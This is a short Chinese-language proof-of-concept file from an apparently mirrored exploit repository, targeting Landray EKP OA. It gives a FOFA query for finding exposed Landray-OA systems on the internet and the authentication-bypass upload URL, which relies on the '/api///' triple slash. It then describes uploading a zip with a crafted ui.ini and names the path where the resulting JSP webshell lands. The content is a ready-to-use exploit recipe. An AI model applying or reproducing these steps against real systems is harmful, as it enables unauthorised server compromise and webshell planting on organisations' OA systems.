admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-05 02:15:30 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/蓝凌OA/蓝凌EKP前台授权绕过导致文件上传.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

31 lines
711 B
Markdown
Raw Blame History

## 蓝凌EKP前台授权绕过导致文件上传
## fofa
```
app="Landray-OA系统"
```
访问路径/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload其中路径需要api后面需要///不能变。
## poc
```
/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload
```
![image](https://github.com/wy876/POC/assets/139549762/47bd374a-d072-46ab-824e-e23ef8d08a69)
## 文件上传
然后上传zip包需要有ui.ini文件内容如下
```
id=ZzzZname=testthumb=test
```
![image](https://github.com/wy876/POC/assets/139549762/1d6615f9-a98b-4747-a6a8-9e6bdd3218c0)
![image](https://github.com/wy876/POC/assets/139549762/1cb1a160-309f-44bb-b0d3-03e59b163258)
马会在/resource/ui-ext/ZzzZ/jmdyy.jsp
Reference in New Issue View Git Blame Copy Permalink